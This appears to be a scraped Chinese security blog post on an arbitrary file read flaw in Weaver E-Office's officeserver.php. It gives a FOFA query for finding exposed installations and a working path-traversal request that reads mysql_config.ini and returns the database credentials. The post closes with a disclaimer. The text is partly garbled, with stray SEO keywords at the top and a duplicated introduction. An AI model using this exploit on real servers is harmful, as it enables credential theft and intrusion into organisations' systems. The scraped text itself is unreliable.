电子商务网站建设用什么登录,湖南还没有建网站的企业,爱奇艺号自媒体平台注册,宁国新站seo简介
泛微E-Office是一款企业级的全流程办公自动化软件#xff0c;它包括协同办公、文档管理、知识管理、工作流管理等多个模块#xff0c;涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。
officeserver.php文件存在任意文件读取漏洞#xff0c;通…
简介
泛微E-Office是一款企业级的全流程办公自动化软件它包括协同办公、文档管理、知识管理、工作流管理等多个模块涵盖了企业日常工作中的各个环节。在该产品前台登录页存在文件读取漏洞。
officeserver.php文件存在任意文件读取漏洞通过漏洞可以下载服务器上的任意文件。 漏洞复现
FOFA语法
app泛微-EOffice icon_hash1578525679 访问后页面如下 POC
/iweboffice/officeserver2.php?OPTIONLOADTEMPLATECOMMANDINSERTFILETEMPLATE../../bin/mysql_config.ini 响应返回页面获取到内网区域数据库用户名和密码 免责声明
请勿利用文章内的相关技术从事非法测试由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失均由使用者本人负责所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用 结语
没有人规定一朵花一定要成长为向日葵或者玫瑰。